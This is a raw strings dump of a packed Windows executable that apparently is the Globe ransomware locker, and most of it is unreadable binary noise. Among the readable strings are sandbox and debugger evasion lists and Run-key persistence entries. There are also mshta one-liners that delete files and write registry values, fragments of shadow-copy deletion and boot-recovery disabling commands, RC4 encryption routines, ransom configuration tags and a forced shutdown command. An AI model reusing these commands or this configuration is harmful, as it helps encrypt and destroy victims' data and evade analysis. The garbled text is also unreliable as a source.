This program must be run under Win32
UPX0
`UPX1
`.rsrc
3.91
UPX!
Byte
Int64
String
TObj
`\XA
dTPL
d,($S
D$'t
uYhD
bcfX
YZ^cY
YZ]_
(,cU
I6~M
_:C	
;>xh/u
BUQF
uBBk
;$>Xr
8W.k@&
';4v_
Av	 
-Y]k
x[js
/u{k
V=L]Q
fpon]\
V}<|
;24h
D0eX,]
P]mjm
u5-t
v1ho
HY)l
A	97a
Byte
Int64
String
TObject
TObject
System
uYhD
YZ^[
SVWU
YZ]_^[
SVWU
]_^[
SVWU
]_^[
SVWU
wE;\$
]_^[
SVWU
]_^[
SVWU
]_^[
SVWU
]_^[
SVWU
]_^[
ZYYd
ZYYd
SVWU
]_^[
YZ^[
SVWU
]_^[
UhT$@
ZYYd
h[$@
Uh+&@
ZYYd
h2&@
SVWU
u,)-
ue;=
]_^[
ZYYd
^[YY]
YZXu
SVWU
8"u@
8"uP
]_^[
,$YXZ
Ht Ht.
F `-@
F$`-@
F d-@
QSVW
_^[Y]
hD0@
r/f=
w)f%
C$`-@
	w%9
~KxI[)
2_^[
YZXt5
YX_^
                                                                
Sg5@
C37@
Sg5@
C37@
@v:k
@aQY
E@|o
BkU'9
hh8@
UhA8@
ZYYd
hH8@
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
PPRTj
YYZX
YZXtp
VWUd
SPRQ
T$(j
SVWU
]_^[
ZTUWVSPRTj
]_^[
d$,1
,t\=
t=HtN
r6t0
t.Ht
ZYYd
_^[YY]
Uh!@@
ZYYd
_^[YY]
SVWUQ
Z]_^[
;_^[
SVWU
]_^[
t!R:
t-Rf;
t f;J
SVWRP
Z_^[X
uXJt
uAJt
u:Jt
It2S
t&J|
t1SVW
;_^[
$Z^[
]_^[
PSVW
_^[X
_^[X
SVWU
]_^[
]_^[
SVWU
]_^[
]_^[
USVW1
_^[]
SVWQ
Z_^[
^[Y]
8\uA
kernel32.dll
GetLongPathNameA
hDU@
hDU@
h`U@
ZYYd
Software\Borland\Locales
Software\Borland\Delphi\Locales
ZYYd
_^[YY]
UhiV@
ZYYd
hpV@
UhvW@
ZYYd
h}W@
ZYYd
ZYYd
ZYYd
UhA\@
ZYYd
hH\@
ZYYd
	TFileName
TSearchRecX
	Exception
EHeapException
EOutOfMemory
EInOutError
	EExternal
EExternalException
	EIntError
EDivByZero
ERangeError
EIntOverflow
EMathError
EInvalidOp
EZeroDivide,d@
	EOverflow
EUnderflow
EInvalidPointer8e@
EInvalidCast
EConvertError
EAccessViolation
EPrivilege
EStackOverflow
	EControlC
EVariantError
EAssertionFailed
EAbstractError
EIntfCastError
ESafecallException
SysUtils
SysUtils
YZ_^[
YZ_^[
0<:r
@w2j
YZ^[
SVWQ
Z_^[
WVS	
(_^[
<*t"<0r=<9w9i
_^[[
QSVW
_^[Y]
INFNAN
QS<$t
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
SVWQ
Z_^[
QSVW
_^[Y]
QQQQQQSVW3
ZYYd
Uha}@
ZYYd
hh}@
^[Y]
ZYYd
QQQQQSVW
ZYYd
yyyy
eeee
D$DP
D$HP
D$PPj
D$LPj
ZYYd
_^[Y]
ZYYd
_^[YY]
	TErrorRec
YZ^[
TExceptRec
SVW3
ZYYd
,tY=
t<HtH
r3t7
t(Ht
ZYYd
ZYYd
SVWUQ
Z]_^[
SVWU
$YZ]_^[
YZ^[
SVWQ
Z_^[
ZYYd
QSVW
_^[Y]
Y_^[
ZYYd
m/d/yy
mmmm d, yyyy
 AMPM
AMPM 
:mm:ss
ZYYd
kernel32.dll
GetDiskFreeSpaceExA
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
Utils
SVW3
ZYYd
ZYYd
SetFileAttributesA
kernel32.dll
ZYYd
_^[YY]
COMSPEC
ZYYd
SVWU
]_^[
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
WVS	
SVW3
ZYYd
ZYYd
SVWU
F,;D$
F4;F,u
^4+\$
YZ]_^[
_^[]
SVWU
D$43
C0;D$
C0+D$
C,+D$
)D$$
T$(;B
)T$$
C,;D$
C0;C(t)
C0;D$
C0+D$
C,+D$
C0;D$
C0+D$
C,+D$
C,;D$
C0;C(t)
C0;D$
C0+D$
C,+D$
C,;D$$u
C,;D$
C0;C(t)
C0;D$
C0+D$
C,+D$
C0;D$
C0+D$
C,+D$
C,;D$
C0;C(t)
C0;D$
C0+D$
C,+D$
C0;D$
C0+D$
C,+D$
C0;C4t8
,]_^[
v#C;
ZYYd
_^[YY]
? s7
@,;E
;B(t/
@0;E
@0+E
@,+E
@0;E
@0+E
@,+E
@,;E
;B(t/
@0;E
@0+E
@,+E
@0;E
@0+E
@,+E
;B4t
ZYYd
ZYYd
Software\Globe\
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\RunOnce\
{EE750B8B-8F1F-4FEB-B415-B9B0FDBD4893}
{5C88358B-74C5-4BAE-8A5B-C2082AF4801A}
Read Me Please
temp
idle
[=(-b)
V6"@
_L#G,
il|V
sxRd[
|^E%
:m,90
&@.j
{@n~8&
\V8z
V	Y$
QH\>"}
59lb
u$NUB
#m#/%'
*"@A[h;
	yEW2
;iH/
m-,S
hWFU
18b]
>/r>
#y*'d
1M$%
W>9U
N09W
88;k{
Uo>8
+n54
C8{=T(
-8c1
Dy}A
mKuly
yQijF
!ms3
?yL@,
<1hh
UE d
$z^'
s>pO
>e~P5h
*%B%
fjD#]bJ=d,
lFFl
{i)'v
gV`3d
pZxh
\u+'
.H{'A
x@#o
(A%R
R3WRiJ
fmSa
Wx`B
exW1
t@XsM
fZ^w
=@"X
JiF;
NbV}
-}cR-
QsJ3
c?m;
LLVd]
PFPVPXD7
A;p[u
a',"!g
*r~$
-1!+.
%m];
78';.'
w	3. 
`8uzGRLpCB
qe\l
[05220]
!!!WALLPAPER!!!
[999999]
	TSETTINGS,
Uh}JC
ZYYd
h(LC
h8LC
hDLC
hPLC
hlLC
h|LC
kernel32.dll
CreateToolhelp32Snapshot
Heap32ListFirst
Heap32ListNext
Heap32First
Heap32Next
Toolhelp32ReadProcessMemory
Process32First
Process32Next
Process32FirstW
Process32NextW
Thread32First
Thread32Next
Module32First
Module32Next
Module32FirstW
Module32NextW
ZYYd
SVW3
ZYYd
ZYYd
SVW3
ZYYd
_^[]
vboxservice.exe
vmtoolsd.exe
wireshark.exe
ollydbg.exe
c:\insidetm
c:\sample.exe
QSVW3
UhXPC
 hlPC
h|PC
ZYYd
_^[Y]
kernel32.dll
IsDebuggerPresent
QSVW
ZYYd
ZYYd
SYSTEM\ControlSet001\Services\Disk\Enum
virtual_box
vbox
virtual_pc
virtual
anubis
qemu
vmware
ZYYd
Uh TC
ZYYd
h'TC
^[Y]
SVW3
Uh;UC
ZYYd
hBUC
SVW3
ZYYd
Uh!WC
ZYYd
h(WC
ZYYd
SVW3
ZYYd
ZYYd
ZYYd
Uh	ZC
ZYYd
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('
close()}catch(e){}},10);"
ZYYd
mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');setInterval(function(){try{o.RegWrite('HKCU\\
APPDATA
}catch(e){}},10);"
UhX]C
ZYYd
h_]C
runas
ZYYd
runas
runas
Uh	`C
ZYYd
APPDATA
SVW3
ZYYd
ZYYd
_^[YY]
ZYYd
ZYYd
TDigits
uBigIntsV30bC
TInteger
TInteger0bC
uBigIntsV3
uBigIntsV3
Z:\DEV\GLOBE.v2.00\LOCKER\uBigIntsV3.pas
Scratchpad synch problem 
SVWQ
Z_^[
$tISV
YZ_^[
SVWU
D$ 3
XZRP
D$ 3
XZRP
D$ 3
L$ u
(]_^[
ZYYd
_^[Y]
$ZXv
SVWU
]_^[
SVWU
]_^[
YZ_^[
SVWU
|$$3
D$(3
XZRP
D$$3
L$$u
,]_^[
|mG3
XZRP
|tF3
QSVW
$ZXt
_^[Y]
|uG3
QSVW
_^[Y]
SVWU
YZ]_^[
_^[]
SVWU
$ZXs
$ZXv
]_^[
SVWU
L$0u
N;t$
L$0u
4]_^[
SVWUQ
$Z]_^[
SVWUQ
Z]_^[
$ZXw
$ZXwJ
SVW3
ZYYd
ZYYd
ZYYd
SVW3
ZYYd
ZYYd
TByteArray
RC4U
SVW3
ZYYd
ZYYd
TEncoder
SVW3
ZYYd
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+-
SVW3
ZYYd
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+-
ZYYd
_^[Y]
SVW3
ZYYd
_^[YY]
QSVW
ZYYd
QQQQSVW
ZYYd
ZYYd
SVW3
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
Microsoft\Exchange Server
Microsoft SQL Server
QQQQQS
ZYYd
QQQQQQS
ZYYd
QQQQQS
ZYYd
QSVW
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ALLUSERSPROFILE
APPDATA
ProgramData
ProgramFiles
ProgramFiles(x86)
WINDIR
$RECYCLE.BIN
All Users
AppData
Application Data
Program Files (x86)
Program Files
System Volume Information
Windows
intel
nvidia
.hta
Globe
SVW3
ZYYd
ZYYd
ZYYd
SVW3
ZYYd
ZYYd
SVW3
ZYYd
ZYYd
min De
e Sha
dows 
edit
t {de
lt} re
yenab
led N
dit /
 {de
} bo
otsta
icy ign
oreal
lfail
ures
virtual_box
virtual_pc
anubis
vmware
ZYYd
[SANDBOXES]
[CIS]
[MELT]
[AUTOEXEC]
[BACKUPS]
[DELAY]
[PROFILE]
[DRIVES]
[SHARES]
[DESKTOP]
[NAMES]
[ADMIN]
[UAC]
[SHUTDOWN]
[/TASKNAME]
[TASKNAME]
[/EXTENSION]
[EXTENSION]
[/TARGETS]
[TARGETS]
[/MESSAGE]
[MESSAGE]
[/N]
[/E]
.exe
ZYYd
QSVW
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
{{IDENTIFIER}}
USERPROFILE
wallpaper.jpg
Control Panel\Desktop\TileWallpaper
Control Panel\Desktop\WallpaperStyle
.hta
mshta.exe "
shutdown /p /f
Error
Runtime error     at 00000000
0123456789ABCDEF
@v:k
 n;^
Qkkbal
i]Wb
9a&g
MGiI
wn>Jj
#.zf
+o*7
Y>@v
&=O8
6Globe
kRC4
KWindows
System
SysInit
UTypes
Math
uBigIntsV3
SysUtils
SysConst
TlHelp32
(ShlObj
sActiveX
3Messages
CommCtrl
*ShellAPI
RegStr
?WinInet
UrlMon
8Registry
JEncrypt
Config
	PasZip
Utils
Install
Sandboxes
Sleep
WriteFile
WinExec
VirtualQuery
TerminateProcess
SetFileTime
SetFilePointer
OpenProcess
OpenMutexA
MoveFileA
LoadLibraryA
GetVersionExA
GetTickCount
GetThreadLocale
GetStringTypeExA
GetStdHandle
GetShortPathNameA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLastError
GetFileAttributesA
GetEnvironmentVariableA
GetDiskFreeSpaceA
GetCPInfo
GetACP
FreeLibrary
FindNextFileA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
ExitProcess
EnumCalendarInfoA
DeleteFileA
CreateProcessA
CreateMutexA
CreateFileA
CopyFileA
CompareStringA
CloseHandle
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
WideCharToMultiByte
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLastError
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
WriteFile
UnhandledExceptionFilter
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
GetStdHandle
GetFileSize
GetFileType
CreateFileA
CloseHandle
RegSetValueExA
RegQueryValueExA
RegOpenKeyExA
RegDeleteValueA
RegCreateKeyExA
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
WNetOpenEnumA
WNetEnumResourceA
WNetCloseEnum
SysFreeString
SysReAllocStringLen
ShellExecuteExA
ShellExecuteA
SHGetSpecialFolderPathA
GetKeyboardType
LoadStringA
MessageBoxA
CharNextA
SystemParametersInfoA
MessageBoxA
LoadStringA
GetSystemMetrics
GetLastInputInfo
CharNextA
CharUpperBuffA
CharToOemA
CODE
`DATA
.idata
.tls
.rdata
P.reloc
P.rsrc
PWSgL
Ou%0
UmWQb
agaH
ysfI
n-MH
gaMd
/k1e#
OrCcp+K
hykIe-aB%
p GG
&=O8
UType
T5`T
(Shlf
3MSsagX
0mmCtr
U#M[
8!iir
	PasZipk
Sleep
adLibra_
Y[*uP
Addr
Envir@
b^[H
=CPY
*opy
i/Km
j#>P
==Id
d,h?
(jmM
BZjnG	,!
:lSqdOf
7Rtl:w_
aikH-J
44[;
cqFold
Bodo
rBuff
/ObAyPEL
^B*s
CODE
[A.)\
tcnO
' `Y
'sr&
XPTPSW
Y>@v
KERNEL32.DLL
advapi32.dll
mpr.dll
oleaut32.dll
shell32.dll
user32.dll
LoadLibraryA
GetProcAddress
VirtualProtect
VirtualAlloc
VirtualFree
ExitProcess
RegCloseKey
WNetOpenEnumA
SysFreeString
ShellExecuteA
CharNextA
